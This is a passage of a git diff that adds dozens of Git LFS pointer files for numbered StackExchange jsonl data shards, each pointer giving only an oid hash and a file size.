sha256:4abff2c0f4d0fb68c6290a480e26089e49d32daca38d6f7ef9cf076a66921fc1 +size 36074574 diff --git a/data/stackexchange/1-1/1909_2289.jsonl b/data/stackexchange/1-1/1909_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1903435b06ed473c11ac4b93312db12346f31a43 --- /dev/null +++ b/data/stackexchange/1-1/1909_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa6f53ebbc97c0e350c378e1fabceadf0a53bd82423a83bd82ca72c2255fb4ee +size 35505878 diff --git a/data/stackexchange/1-1/190_2289.jsonl b/data/stackexchange/1-1/190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c52631d8c94bb896c3f81aa623862f80017a3959 --- /dev/null +++ b/data/stackexchange/1-1/190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f63df2ea36ceea27786796244dca3ed72081fa7b20fcaab8c000647fb317d218 +size 34847796 diff --git a/data/stackexchange/1-1/1910_2289.jsonl b/data/stackexchange/1-1/1910_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa16f91e62422b504344c8fc948d7b436b7d9eb4 --- /dev/null +++ b/data/stackexchange/1-1/1910_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b5a47c7c61dc535d0a59c33e70ab42816f5b0f1f92f5772beabd7fb95471d7a +size 35431340 diff --git a/data/stackexchange/1-1/1911_2289.jsonl b/data/stackexchange/1-1/1911_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fb9497d1faf51e3154a72286f007b09e9731fda --- /dev/null +++ b/data/stackexchange/1-1/1911_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d9774dd0dedd4d9c9c6fe1847084064d4a94fc2a224110223e250249f3ef6b7 +size 36126100 diff --git a/data/stackexchange/1-1/1912_2289.jsonl b/data/stackexchange/1-1/1912_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29490dad7a260a03623e048f5b5ef53991bdf127 --- /dev/null +++ b/data/stackexchange/1-1/1912_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e0ae45a87b24537d3d55408422b9c94b888ca513d679abe8dfc92a7f8fb1e3d +size 35649985 diff --git a/data/stackexchange/1-1/1913_2289.jsonl b/data/stackexchange/1-1/1913_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5c43679942554c4fd20e7ed9e26c784271712ea --- /dev/null +++ b/data/stackexchange/1-1/1913_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf9cf0d25e21c2ab581f950a0e03156c2d94e8734b5d445f26958381c1ea4370 +size 36158075 diff --git a/data/stackexchange/1-1/1914_2289.jsonl b/data/stackexchange/1-1/1914_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ffa951392f49e4bc906b897f72feb03e0154b3b --- /dev/null +++ b/data/stackexchange/1-1/1914_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:090b095dd15d14f43f456d06c1a9a02e09d400548ab397c6a43ec3868c024032 +size 36202720 diff --git a/data/stackexchange/1-1/1915_2289.jsonl b/data/stackexchange/1-1/1915_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d86f9cf45e0a1bd64bd9f5b2ed77d53ad2456b0b --- /dev/null +++ b/data/stackexchange/1-1/1915_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6613b7f831b5bbe277b25898907d2e3f2fb8321e0c16d9df4f0e525e170dc9c6 +size 35717765 diff --git a/data/stackexchange/1-1/1916_2289.jsonl b/data/stackexchange/1-1/1916_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63c5afd94078c2c9badb521c0014e46cbb973915 --- /dev/null +++ b/data/stackexchange/1-1/1916_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94faa8e2629839f1ea35e12810ca37634561294179bd21f3cf52d6a412db7cc1 +size 35484621 diff --git a/data/stackexchange/1-1/1917_2289.jsonl b/data/stackexchange/1-1/1917_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76d4740ba3d652f84a2897d1a198488e22540ba3 --- /dev/null +++ b/data/stackexchange/1-1/1917_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9333decc1e2b89cd0c29a5f10f1a48f2dee5d976aaae3b0ee697a24a30bd15f6 +size 36084592 diff --git a/data/stackexchange/1-1/1918_2289.jsonl b/data/stackexchange/1-1/1918_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f450f6c54adcc31c960a5a84ef40e70cba6ad5a --- /dev/null +++ b/data/stackexchange/1-1/1918_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc543dd0adf3bebbce4cf92c9e17ce03fa1bdd8ea492f127016c44575a2bdf48 +size 36133357 diff --git a/data/stackexchange/1-1/1919_2289.jsonl b/data/stackexchange/1-1/1919_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e58945785ec473ea35e8bd0e313bcb929144b017 --- /dev/null +++ b/data/stackexchange/1-1/1919_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c16f414b76029b874d4bc5d2e688e189a33ee49e674c5afd1b34ece1ea402149 +size 36209858 diff --git a/data/stackexchange/1-1/191_2289.jsonl b/data/stackexchange/1-1/191_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ab3e0e2f4fc7514d3b2910e452cb1780506fc87 --- /dev/null +++ b/data/stackexchange/1-1/191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38f9e08396fd9d43713688a227a8595218d23cd21628f27a0d26184c7fd65c2c +size 35000159 diff --git a/data/stackexchange/1-1/1920_2289.jsonl b/data/stackexchange/1-1/1920_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d88488ab3bfac4cba3709f4b64070cf635419665 --- /dev/null +++ b/data/stackexchange/1-1/1920_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b9964dca878b2a8baead3a7f54b15d026565e748839072a15455b332a90677e +size 36150315 diff --git a/data/stackexchange/1-1/1921_2289.jsonl b/data/stackexchange/1-1/1921_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e50484bf2f0030e02d915d35590f790a5f1a0c0a --- /dev/null +++ b/data/stackexchange/1-1/1921_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:544fc93288fb8d4f97c0967f649a1183a60d60d2679e4a1c1a2137b585decbd3 +size 35740013 diff --git a/data/stackexchange/1-1/1922_2289.jsonl b/data/stackexchange/1-1/1922_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31b4ff120059dfcd39bae75879e7a9f547eaaffe --- /dev/null +++ b/data/stackexchange/1-1/1922_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6efd013d530770f4aa0ba290e74801cb52869c792059f3bcc33b5741d553f7eb +size 35914252 diff --git a/data/stackexchange/1-1/1923_2289.jsonl b/data/stackexchange/1-1/1923_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..378ff4edb093acb3edb930c5557136076a82f29c --- /dev/null +++ b/data/stackexchange/1-1/1923_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02967366b5fb4845c23d59191553bb692c36f2faccc0b225fca1c2bef0ab95f7 +size 36454778 diff --git a/data/stackexchange/1-1/1924_2289.jsonl b/data/stackexchange/1-1/1924_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9272defd645aac8b5412b7a6e7839c5e1f26635f --- /dev/null +++ b/data/stackexchange/1-1/1924_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16c681321fd60f31d685226acd09a288404dd480026fc350027ecfe51aa44ede +size 36591141 diff --git a/data/stackexchange/1-1/1925_2289.jsonl b/data/stackexchange/1-1/1925_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a61ee45d2edd5deefe99bcc8423d59cc114bae4 --- /dev/null +++ b/data/stackexchange/1-1/1925_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6db7aece32d97b777e71c3337b4becab871bf41db77e0c72a5a14cc8da03a6d5 +size 35993062 diff --git a/data/stackexchange/1-1/1926_2289.jsonl b/data/stackexchange/1-1/1926_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1968935f15670ecb17aab34187bbfff66c97119 --- /dev/null +++ b/data/stackexchange/1-1/1926_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f65b2fd2426dccada17a4cd05391dcae804daab874027787772ea15d433de1cd +size 36588846 diff --git a/data/stackexchange/1-1/1927_2289.jsonl b/data/stackexchange/1-1/1927_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eebffba45c4100736bdf060f3a29791ef9a7ff09 --- /dev/null +++ b/data/stackexchange/1-1/1927_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15b8aa20cd527cdcd0c2ddcd4ae18cdb54490b8ab90f245a90d9e0b7f22b429f +size 36138954 diff --git a/data/stackexchange/1-1/1928_2289.jsonl b/data/stackexchange/1-1/1928_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d22aaf15b193b4cd24bd1765e31fcf957f1f6dd9 --- /dev/null +++ b/data/stackexchange/1-1/1928_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fc49a20cde24aa400de5a3db0a4e5d2ec7c7750bdb3aa91834c25d15b8efaed +size 35872645 diff --git a/data/stackexchange/1-1/1929_2289.jsonl b/data/stackexchange/1-1/1929_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1dee12f24830c2eb187231df846b52c8d9ac5b4 --- /dev/null +++ b/data/stackexchange/1-1/1929_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2728ceb756c6294f866e4f28c1ac2fdb7fdec95774c58bf54d646b6e8dcd3253 +size 35953165 diff --git a/data/stackexchange/1-1/192_2289.jsonl b/data/stackexchange/1-1/192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..949642d3882aa00e37d8d33bfe0ec17a09cfb65f --- /dev/null +++ b/data/stackexchange/1-1/192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35b29c52ad93f7c14ffae1647558c121ea4e6f15c2acbc99500b9d7af0995727 +size 35187705 diff --git a/data/stackexchange/1-1/1930_2289.jsonl b/data/stackexchange/1-1/1930_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53d89edcbf3b0ea1a81363ea4ad6bfd1b4295519 --- /dev/null +++ b/data/stackexchange/1-1/1930_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf32aeca9debc26f00b67d18d27498e23f585bdf7169aa0bf7b19519ee71bb02 +size 35920902 diff --git a/data/stackexchange/1-1/1931_2289.jsonl b/data/stackexchange/1-1/1931_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5efb8f86a310bc0740dc75326400fbd24049e29 --- /dev/null +++ b/data/stackexchange/1-1/1931_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8bac7038e30834b7598a08819ba87ce53d4cb61fd39570c8f9ba19f6d2a32841 +size 35537025 diff --git a/data/stackexchange/1-1/1932_2289.jsonl b/data/stackexchange/1-1/1932_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e84855e9da571374af3ef364ed70c78e4150409 --- /dev/null +++ b/data/stackexchange/1-1/1932_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64c5761f7220325fe5fc5611bac49542b1c7c1afaa0579198a255fc9772106b +size 35856199 diff --git a/data/stackexchange/1-1/1933_2289.jsonl b/data/stackexchange/1-1/1933_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..839a455929dd74b3a88f49ba5d7e3006158a3d93 --- /dev/null +++ b/data/stackexchange/1-1/1933_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c070c1605ac28d5af03b252baa39fb199b61b974d9c7cbe128c743a30b723cde +size 36319736 diff --git a/data/stackexchange/1-1/1934_2289.jsonl b/data/stackexchange/1-1/1934_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a594e66db4eb6f2467319657478fcdae04a25def --- /dev/null +++ b/data/stackexchange/1-1/1934_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc5a1ff9a01de0c12e985719d890685364e4af73d7d78c99f8c038f197b2696a +size 35634048 diff --git a/data/stackexchange/1-1/1935_2289.jsonl b/data/stackexchange/1-1/1935_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe9f2cb2341aa325dad9385c92e28d9d11293eeb --- /dev/null +++ b/data/stackexchange/1-1/1935_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4854c01d0d5ef83ad5f9f9b76bffd843a3b2d45087b499b254d45b0bd7f7176 +size 36207489 diff --git a/data/stackexchange/1-1/1936_2289.jsonl b/data/stackexchange/1-1/1936_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af55db6d2c658a7ba75c63f45ea5dbb606f09fce --- /dev/null +++ b/data/stackexchange/1-1/1936_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62383dc19d44ef3843b8c72a12c4e8698f9b7b7b486be0ec709f1056e2a8d713 +size 35644839 diff --git a/data/stackexchange/1-1/1937_2289.jsonl b/data/stackexchange/1-1/1937_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6b7409e9f28ea373d1e9f2c9f093bffca7ced7e --- /dev/null +++ b/data/stackexchange/1-1/1937_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8ce1beb95cc8ce6fa0e178a3ee67bfee8ae304ba9b6b514dc50c84134067919 +size 35921766 diff --git a/data/stackexchange/1-1/1938_2289.jsonl b/data/stackexchange/1-1/1938_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f70dfed4687b97a5d2bc5a23bbcd6fd29d83ea6c --- /dev/null +++ b/data/stackexchange/1-1/1938_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:597c982b21c20645d97b51a3254855309bdc486a74d37a8dc9f712a793a504d0 +size 35668149 diff --git a/data/stackexchange/1-1/1939_2289.jsonl b/data/stackexchange/1-1/1939_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a248e7c906ea4eba154d050d968bfd75aad14d3e --- /dev/null +++ b/data/stackexchange/1-1/1939_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:807e7d019ad882b820a4b051965d34a71475e696e17384508733125a379d648a +size 37489199 diff --git a/data/stackexchange/1-1/193_2289.jsonl b/data/stackexchange/1-1/193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6dcef34004414c793f41c8a08f4cd0e7a0435fd --- /dev/null +++ b/data/stackexchange/1-1/193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f97195ea5c5257a18be79628119a7b3e797ffcd9482f5f7b5f1f84ae721d3191 +size 34652197 diff --git a/data/stackexchange/1-1/1940_2289.jsonl b/data/stackexchange/1-1/1940_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..330a2bb6bd3b12ce16ccfdd8a34d2de9ded1bd87 --- /dev/null +++ b/data/stackexchange/1-1/1940_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffbb905bab85a944f7a4d85f24ee794a53518829ebbd856e789a7aac28f64102 +size 38056271 diff --git a/data/stackexchange/1-1/1941_2289.jsonl b/data/stackexchange/1-1/1941_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..350153c93dc22f134cd58a02294138ce8d3e1981 --- /dev/null +++ b/data/stackexchange/1-1/1941_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d8e1fdcd471fcac0a9620e2e408d5fe8d1c135ac2fec9ae8492e5c79bb8ee0f +size 38015858 diff --git a/data/stackexchange/1-1/1942_2289.jsonl b/data/stackexchange/1-1/1942_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a9794ec9e633dc6f50f00f6a2a8de8cfd08cc08 --- /dev/null +++ b/data/stackexchange/1-1/1942_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb5a16805ebb319433e83dccf040634ef76bcde654e9bdc883e89e3fa19b140 +size 37765627 diff --git a/data/stackexchange/1-1/1943_2289.jsonl b/data/stackexchange/1-1/1943_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..289c71d23f05becd5b9f8055934e2a2794de58d6 --- /dev/null +++ b/data/stackexchange/1-1/1943_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f79d7a3d19f4c827ad568926a6655ebab65ebe43e0767157d8b4c8960a109a5a +size 38579387 diff --git a/data/stackexchange/1-1/1944_2289.jsonl b/data/stackexchange/1-1/1944_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..836943215d2be58c37041dc461a3ce17f229333b --- /dev/null +++ b/data/stackexchange/1-1/1944_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79e3ce2b2def8389cf11fbd942f90326b998e924d4face413ca0ecaa9f4a3e70 +size 38008503 diff --git a/data/stackexchange/1-1/1945_2289.jsonl b/data/stackexchange/1-1/1945_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7343e5c03925b2d516893bd2019ec4b61ebf01ad --- /dev/null +++ b/data/stackexchange/1-1/1945_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9632de2db49523211c4d2eef461cb4c01c6da64340a870059e095a01b51cfd66 +size 38138420 diff --git a/data/stackexchange/1-1/1946_2289.jsonl b/data/stackexchange/1-1/1946_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cc64b40907d066f02c265c8f7d8760a7d700456 --- /dev/null +++ b/data/stackexchange/1-1/1946_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c55b3fa99ce46666f96a2fda8a50224a121998a173937b94c97f011531fbfbf +size 38287532 diff --git a/data/stackexchange/1-1/1947_2289.jsonl b/data/stackexchange/1-1/1947_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1e157dc727a9097e916c4a5b3774fa2d0ed67097 --- /dev/null +++ b/data/stackexchange/1-1/1947_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:335a911b0d390c827e059daf0b9e55c71f527de34afc0dd2d243bbd6d05937f3 +size 37858953 diff --git a/data/stackexchange/1-1/1948_2289.jsonl b/data/stackexchange/1-1/1948_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ee23f7cbefc7fe0c00952e5bc1efb765ae5219c --- /dev/null +++ b/data/stackexchange/1-1/1948_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ea93963af6b5dabf170faeab3743bfb7d145f730d63708d984bdd4c0aa2c8c2 +size 38060353 diff --git a/data/stackexchange/1-1/1949_2289.jsonl b/data/stackexchange/1-1/1949_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e2a24ecb1273d060f1894575050fdd23d998adf --- /dev/null +++ b/data/stackexchange/1-1/1949_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cfd2afa591e2a6e980bc1cfdfd48b1c249f485741212e53e709f4b4f48c1117a +size 37635913 diff --git a/data/stackexchange/1-1/194_2289.jsonl b/data/stackexchange/1-1/194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69ec172114f858d35dbd127b3c48a919aa949649 --- /dev/null +++ b/data/stackexchange/1-1/194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7538eb6cb4f082491bf091e5316c891a32da6a7851bf35a0f012001d39efcec9 +size 35369791 diff --git a/data/stackexchange/1-1/1950_2289.jsonl b/data/stackexchange/1-1/1950_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84a826baa51cea90aab5ca9138e852f360cd6530 --- /dev/null +++ b/data/stackexchange/1-1/1950_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4cbf4ce1952ba378b794fbc4a6ba35f849b3f6f17175a7c1becaf2641023706e +size 38479558 diff --git a/data/stackexchange/1-1/1951_2289.jsonl b/data/stackexchange/1-1/1951_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cde63b68f941f52082bc7c1ecee1a38cc9ffe950 --- /dev/null +++ b/data/stackexchange/1-1/1951_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af5c3a0c37b84996f1453328225eed31b9bcde97509bf18b3462cab8ae335d96 +size 38387493 diff --git a/data/stackexchange/1-1/1952_2289.jsonl b/data/stackexchange/1-1/1952_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e58eb5565c328bacd7b5ff928e85cc81952a002 --- /dev/null +++ b/data/stackexchange/1-1/1952_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd3fc4ce7832d1b854ca9b686db20e2a41de549d913ee029bfad274cf46fc75c +size 38267780 diff --git a/data/stackexchange/1-1/1953_2289.jsonl b/data/stackexchange/1-1/1953_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78addb1356d71777a89f7abd32497cff69af70e7 --- /dev/null +++ b/data/stackexchange/1-1/1953_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6889e6c416c4bf3ff89096932177766781a51fa86ac0a87da56ee63c95eea32 +size 38174403 diff --git a/data/stackexchange/1-1/1954_2289.jsonl b/data/stackexchange/1-1/1954_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4315f7f84a2b905068b02fcce0b1e530a386385b --- /dev/null +++ b/data/stackexchange/1-1/1954_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22ef646b4b86402f768fabbce9ce07e3d231a5e339d88be74a67904285c92ad5 +size 37764125 diff --git a/data/stackexchange/1-1/1955_2289.jsonl b/data/stackexchange/1-1/1955_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c717cf35bcec5a44bd8be2ba7a3469cbf19116a2 --- /dev/null +++ b/data/stackexchange/1-1/1955_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34b9ce7b9913ce6086f95b60c519178af3dcb7f6afc645d9e98be559dd90c4ab +size 38178444 diff --git a/data/stackexchange/1-1/1956_2289.jsonl b/data/stackexchange/1-1/1956_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1dea58bb263e53d3a1bdbe2e6e2515734796b0e --- /dev/null +++ b/data/stackexchange/1-1/1956_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14be8f68cfb478a792c2496bae65bd6f2af323f3b86ec1c802c3cc3685923ad4 +size 39037021 diff --git a/data/stackexchange/1-1/1957_2289.jsonl b/data/stackexchange/1-1/1957_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45acbb347acd987e2ad5599238f8f6b7ab3027e5 --- /dev/null +++ b/data/stackexchange/1-1/1957_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c0179ef0c50f867f7a7f02a74e81ce4cc3bb52c6738986df1cc6c46818a4fd6 +size 37476199 diff --git a/data/stackexchange/1-1/1958_2289.jsonl b/data/stackexchange/1-1/1958_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78372716baa504192e67512e26a6627d45ac3d15 --- /dev/null +++ b/data/stackexchange/1-1/1958_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4936b4f4623abe87604cb56ac6afde548f6adb4b7ac21e1f587fed237220f580 +size 38350428 diff --git a/data/stackexchange/1-1/1959_2289.jsonl b/data/stackexchange/1-1/1959_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a2135edba77dc8a9514da46462b4e471354440e --- /dev/null +++ b/data/stackexchange/1-1/1959_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38646cd69e4d1e35b0c28717696d48fd2ba3218a14b56c1f9756eb4d86fdd62b +size 37933655 diff --git a/data/stackexchange/1-1/195_2289.jsonl b/data/stackexchange/1-1/195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7417a9490656f0470f9f5fe5a8048202bb6985d8 --- /dev/null +++ b/data/stackexchange/1-1/195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7400a47f82ba48561f95476139d5977b94d52a1c94b388150eb2caedd904f886 +size 34763159 diff --git a/data/stackexchange/1-1/1960_2289.jsonl b/data/stackexchange/1-1/1960_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b1080557be3afce3a8173228a2f2846b2fe4d01 --- /dev/null +++ b/data/stackexchange/1-1/1960_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd39c4da497d899d391d68fde9e820904e1972a124f174b9bbcb6591788a3c1 +size 37796822 diff --git a/data/stackexchange/1-1/1961_2289.jsonl b/data/stackexchange/1-1/1961_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6feae4825b980fecaba082210652a0fa5bc1905e --- /dev/null +++ b/data/stackexchange/1-1/1961_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e82052691c086de5bf8bb6704a89bbbc32a0db653c1d978cb0311dcb9be240a4 +size 37691233 diff --git a/data/stackexchange/1-1/1962_2289.jsonl b/data/stackexchange/1-1/1962_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8cabc8af8a6ec1e247e226a1fff99590208d32e --- /dev/null +++ b/data/stackexchange/1-1/1962_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77ea54c2ac09f62cfc9a12f80582b89d481219536145d360f5c28e8c051b0519 +size 37884139 diff --git a/data/stackexchange/1-1/1963_2289.jsonl b/data/stackexchange/1-1/1963_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..934e79532e6ed11836fe739e065d7cdeb750a61f --- /dev/null +++ b/data/stackexchange/1-1/1963_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d0c2a84a342a7d34f5bd09bf8ad38f75c78473d39eedf3580848115601ff1f4 +size 38661370 diff --git a/data/stackexchange/1-1/1964_2289.jsonl b/data/stackexchange/1-1/1964_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e12a30c84e6d8a624dc60232a0fd065d628ec13 --- /dev/null +++ b/data/stackexchange/1-1/1964_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:614391bfcc3c576543d137fb8a18f8f2e6d906598f96b7b45f925f833e9ecbcc +size 37705282 diff --git a/data/stackexchange/1-1/1965_2289.jsonl b/data/stackexchange/1-1/1965_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68652d532771d70e57f9c072b8856c83ce45d3e5 --- /dev/null +++ b/data/stackexchange/1-1/1965_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46d9948a17d70405e59bc799b076e8b021db3be7c96b58580476cb79185be423 +size 37873748 diff --git a/data/stackexchange/1-1/1966_2289.jsonl b/data/stackexchange/1-1/1966_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fa0c9bc1206412be70bd5ef2f627a131680da3f --- /dev/null +++ b/data/stackexchange/1-1/1966_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82f56597734d580679d0e85e415ad5ee226779ae511da6276993987b2e60167b +size 37957564 diff --git a/data/stackexchange/1-1/1967_2289.jsonl b/data/stackexchange/1-1/1967_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03a9135e5b2f00417fbe4a014e746ff2d783f2a4 --- /dev/null +++ b/data/stackexchange/1-1/1967_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 